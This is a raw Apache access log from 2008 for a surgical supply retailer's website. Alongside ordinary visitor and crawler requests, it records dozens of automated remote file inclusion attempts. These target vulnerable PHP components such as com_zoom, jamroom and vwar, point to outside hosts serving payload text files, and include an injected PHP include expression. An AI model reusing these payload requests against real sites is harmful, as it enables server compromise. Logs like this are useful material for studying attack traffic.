71.119.54.161 - - [09/Sep/2008:00:58:53 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
71.119.54.161 - - [09/Sep/2008:00:58:53 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
74.6.17.183 - - [09/Sep/2008:00:55:39 -0400] "GET /logs/access_log.Q108021200 HTTP/1.0" 200 3468920 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [09/Sep/2008:00:59:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.172.55.178 - - [09/Sep/2008:01:00:39 -0400] "GET /index.php?AMG_open=comments&AMG_id=http://www.bloch.dk/includes/js/tabs/rhs/bot.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
209.172.55.178 - - [09/Sep/2008:01:00:39 -0400] "GET /logs/index.php?AMG_open=comments&AMG_id=http://www.bloch.dk/includes/js/tabs/rhs/bot.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
74.6.17.183 - - [09/Sep/2008:01:00:56 -0400] "GET /logs/error_log.Q107071600 HTTP/1.0" 200 151273 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
216.246.41.206 - - [09/Sep/2008:01:01:28 -0400] "GET /logs/access_log.Q108082400/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.arcorshop24.de//modules/id.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.810"
216.246.41.206 - - [09/Sep/2008:01:01:30 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.arcorshop24.de//modules/id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.810"
216.246.41.206 - - [09/Sep/2008:01:01:31 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.arcorshop24.de//modules/id.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.810"
216.246.41.206 - - [09/Sep/2008:01:01:33 -0400] "GET /logs/access_log.Q108071700/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.arcorshop24.de//modules/id.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.810"
66.103.128.44 - - [09/Sep/2008:01:03:55 -0400] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 244 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
66.103.128.44 - - [09/Sep/2008:01:03:56 -0400] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
195.39.5.203 - - [09/Sep/2008:01:04:19 -0400] "GET /logs/access_log.Q108052400//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
195.39.5.203 - - [09/Sep/2008:01:04:22 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
195.39.5.203 - - [09/Sep/2008:01:04:23 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
195.39.5.203 - - [09/Sep/2008:01:04:25 -0400] "GET /logs/access_log.Q108052400//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
195.39.5.203 - - [09/Sep/2008:01:04:26 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
195.39.5.203 - - [09/Sep/2008:01:04:27 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
209.59.12.99 - - [09/Sep/2008:01:04:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.39.5.203 - - [09/Sep/2008:01:04:38 -0400] "GET /logs/error_log.Q108052400//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
62.119.28.109 - - [09/Sep/2008:01:04:41 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/paijoe.style/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
62.119.28.109 - - [09/Sep/2008:01:04:43 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/paijoe.style/id.txt? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
195.39.5.203 - - [09/Sep/2008:01:04:43 -0400] "GET /logs/access_log.Q108052400//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
195.39.5.203 - - [09/Sep/2008:01:04:44 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
195.39.5.203 - - [09/Sep/2008:01:04:45 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
66.249.67.114 - - [09/Sep/2008:01:01:46 -0400] "GET /logs/access_log.Q108060600 HTTP/1.1" 200 3080021 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.49.100.20 - - [09/Sep/2008:01:05:01 -0400] "GET /logs/access_log.Q108060700/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.thebadst.com/wing.jpg?? HTTP/1.1" 404 268 "-" "libwww-perl/5.69"
200.93.147.155 - - [09/Sep/2008:01:05:02 -0400] "GET /logs/access_log.Q108081600/errors.php?error=http://www.geocities.com/linasuci/new.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
200.93.147.155 - - [09/Sep/2008:01:05:03 -0400] "GET /logs/errors.php?error=http://www.geocities.com/linasuci/new.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
78.159.111.131 - - [09/Sep/2008:01:05:24 -0400] "GET //?prefix=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
195.39.5.203 - - [09/Sep/2008:01:05:28 -0400] "GET /logs/access_log.Q108052400//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
195.39.5.203 - - [09/Sep/2008:01:05:28 -0400] "GET /logs/access_log.Q108052400//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
195.39.5.203 - - [09/Sep/2008:01:05:34 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
195.39.5.203 - - [09/Sep/2008:01:05:34 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
78.159.111.131 - - [09/Sep/2008:01:05:24 -0400] "GET /logs//?prefix=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 200 64126 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
195.39.5.203 - - [09/Sep/2008:01:05:36 -0400] "GET /logs/access_log.Q108052400//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
195.39.5.203 - - [09/Sep/2008:01:05:39 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
195.39.5.203 - - [09/Sep/2008:01:05:39 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
195.39.5.203 - - [09/Sep/2008:01:05:40 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
195.39.5.203 - - [09/Sep/2008:01:05:41 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
195.39.5.203 - - [09/Sep/2008:01:05:55 -0400] "GET /logs/access_log.Q108052400//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
195.39.5.203 - - [09/Sep/2008:01:05:56 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
195.39.5.203 - - [09/Sep/2008:01:05:57 -0400] "GET /logs/error_log.Q108052400//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
195.39.5.203 - - [09/Sep/2008:01:06:14 -0400] "GET /logs/access_log.Q108081800//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
195.39.5.203 - - [09/Sep/2008:01:06:36 -0400] "GET /logs/access_log.Q108081800//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
209.61.244.6 - - [09/Sep/2008:01:06:59 -0400] "GET /logs/access_log.Q108082300//modules/4nAlbum/public/displayCategory.php?basepath=http://www.trosken.com/id.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.76"
62.119.28.109 - - [09/Sep/2008:01:07:15 -0400] "GET /logs/access_log.Q108071700/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/paijoe.style/id.txt? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
195.39.5.203 - - [09/Sep/2008:01:07:33 -0400] "GET /logs/access_log.Q108081800//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
195.39.5.203 - - [09/Sep/2008:01:07:55 -0400] "GET /logs/access_log.Q108081800//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
195.39.5.203 - - [09/Sep/2008:01:08:07 -0400] "GET /logs/access_log.Q108081800//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
62.75.170.176 - - [09/Sep/2008:01:08:41 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.milf2gilf.com/forums/skin_acp/IPB2_Standard/acp_skin_html/index.php/extreme/busk.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
62.75.170.176 - - [09/Sep/2008:01:08:50 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.milf2gilf.com/forums/skin_acp/IPB2_Standard/acp_skin_html/index.php/extreme/busk.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
209.59.12.99 - - [09/Sep/2008:01:09:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.91.118.150 - - [09/Sep/2008:01:09:35 -0400] "GET /logs/error_log.Q108030100/convert/mvcw.php?step=1&vwar_root=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
80.91.118.150 - - [09/Sep/2008:01:09:35 -0400] "GET /logs/error_log.Q108030100/convert/mvcw.php?step=1&vwar_root=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
80.91.118.150 - - [09/Sep/2008:01:09:35 -0400] "GET /convert/mvcw.php?step=1&vwar_root=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.79"
80.91.118.150 - - [09/Sep/2008:01:09:35 -0400] "GET /convert/mvcw.php?step=1&vwar_root=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.79"
80.91.118.150 - - [09/Sep/2008:01:09:36 -0400] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.79"
80.91.118.150 - - [09/Sep/2008:01:09:36 -0400] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.79"
80.93.62.97 - - [09/Sep/2008:01:09:39 -0400] "GET ///vwar/backup/errors.php?error=http://br.geocities.com/kaizoku_56/sak4w/id2.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
80.93.62.97 - - [09/Sep/2008:01:09:39 -0400] "GET ///vwar/backup/errors.php?error=http://br.geocities.com/kaizoku_56/sak4w/id2.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
80.91.118.150 - - [09/Sep/2008:01:09:46 -0400] "GET /logs/access_log.Q108050200/convert/mvcw.php?step=1&vwar_root=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
80.91.118.150 - - [09/Sep/2008:01:09:46 -0400] "GET /logs/access_log.Q108050200/convert/mvcw.php?step=1&vwar_root=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
198.65.23.238 - - [09/Sep/2008:01:10:46 -0400] "GET /logs/access_log.Q108081100//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight='.include($_GET[a]),exit.'&a=http://www.propowerfit.com/articledirectory/jepang.gl?? HTTP/1.0" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
198.65.23.238 - - [09/Sep/2008:01:10:46 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight='.include($_GET[a]),exit.'&a=http://www.propowerfit.com/articledirectory/jepang.gl?? HTTP/1.0" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
64.12.116.142 - - [09/Sep/2008:01:10:56 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.117.80 - - [09/Sep/2008:01:10:56 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.117.13 - - [09/Sep/2008:01:10:57 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.117.69 - - [09/Sep/2008:01:10:57 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
59.126.46.141 - - [09/Sep/2008:01:11:34 -0400] "GET /logs/error_log.Q108071300//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://carolinegunawan.com/images/gid.txt??? HTTP/1.1" 404 283 "-" "libwww-perl/5.79"
198.65.23.238 - - [09/Sep/2008:01:11:36 -0400] "GET /logs/access_log.Q108081100//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight='.include($_GET[a]),exit.'&a=http://www.propowerfit.com/articledirectory/jepang.gl?? HTTP/1.0" 404 235 "-" "libwww-perl/5.53"
198.65.23.238 - - [09/Sep/2008:01:11:36 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight='.include($_GET[a]),exit.'&a=http://www.propowerfit.com/articledirectory/jepang.gl?? HTTP/1.0" 404 208 "-" "libwww-perl/5.53"
198.65.23.238 - - [09/Sep/2008:01:11:36 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight='.include($_GET[a]),exit.'&a=http://www.propowerfit.com/articledirectory/jepang.gl?? HTTP/1.0" 404 213 "-" "libwww-perl/5.53"
74.54.29.66 - - [09/Sep/2008:01:12:08 -0400] "GET /logs/access_log.Q108081100//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://163.26.12.232/aDu/alls.txt????? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
74.54.29.66 - - [09/Sep/2008:01:12:09 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://163.26.12.232/aDu/alls.txt????? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
74.54.29.66 - - [09/Sep/2008:01:12:11 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://163.26.12.232/aDu/alls.txt????? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
66.249.67.114 - - [09/Sep/2008:01:08:27 -0400] "GET /logs/access_log.Q108060600 HTTP/1.1" 200 3080021 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
64.12.117.196 - - [09/Sep/2008:01:12:44 -0400] "GET /CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8 HTTP/1.1" 200 64450 "http://www.acesurgical.com/trufix.html" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.116.207 - - [09/Sep/2008:01:12:45 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.116.143 - - [09/Sep/2008:01:12:45 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.116.136 - - [09/Sep/2008:01:12:45 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.117.202 - - [09/Sep/2008:01:12:45 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.116.195 - - [09/Sep/2008:01:12:45 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.117.208 - - [09/Sep/2008:01:12:45 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.117.198 - - [09/Sep/2008:01:12:45 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
209.90.77.32 - - [09/Sep/2008:01:12:45 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.trosken.com/echo? HTTP/1.1" 404 274 "-" "libwww-perl/5.810"
64.12.116.70 - - [09/Sep/2008:01:12:45 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.116.74 - - [09/Sep/2008:01:12:45 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.116.69 - - [09/Sep/2008:01:12:45 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.117.131 - - [09/Sep/2008:01:12:45 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.117.135 - - [09/Sep/2008:01:12:45 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.117.137 - - [09/Sep/2008:01:12:45 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.116.131 - - [09/Sep/2008:01:12:46 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.117.198 - - [09/Sep/2008:01:12:46 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.116.13 - - [09/Sep/2008:01:12:46 -0400] "GET /images/items/45418015_THUMB.JPG HTTP/1.1" 200 16032 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.116.9 - - [09/Sep/2008:01:12:46 -0400] "GET /images/items/45419001_THUMB.JPG HTTP/1.1" 200 14901 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.116.16 - - [09/Sep/2008:01:12:46 -0400] "GET /images/items/45417901_THUMB.JPG HTTP/1.1" 200 14987 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
